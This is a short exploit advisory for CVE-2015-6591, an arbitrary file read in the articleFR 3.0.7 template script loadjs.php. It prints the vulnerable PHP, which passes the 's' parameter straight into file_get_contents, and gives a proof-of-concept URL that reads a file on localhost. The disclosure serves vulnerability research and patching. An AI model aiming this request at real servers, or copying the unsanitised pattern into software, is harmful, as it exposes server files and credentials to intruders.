# Exploit Title: articleFR any file read vulnerability in v3.0.7 # Date: 2015-09-06 # Vendor: Free Reprintables # Exploit Author: cfreer & 0keeTeam # Product web page: http://www.freereprintables.com # Version: 3.0.7 # CVE : CVE-2015-6591 Details of the vulnerability are as follows: Affected version: Version 3.0.7 and before. Discover date:2015/9/6 Tested on: Apache/2.4.7 (Win32) =================================================== The vulnerable parameter is ‘s’ ( in articleFR\application\templates\amelia\loadjs.php). Finally, Parameter ‘s’ was directly into the function of file_get_contents. <? header('Content-Type: application/javascript'); $_content = file_get_contents($_GET['s']); $_content = preg_replace('/(' . $_GET['h'] . ')/sim', $_GET['r'], $_content); print $_content; exit; ?> Proof of Concept: ================================================================================================= http://127.0.0.1/articleFR/application/templates/amelia/loadjs.php?h=cfreer&r=0keeTeam&s=loadjs.php ================================================================================================= referer: https://github.com/poc-lab/exp/blob/master/CVE-2015-6591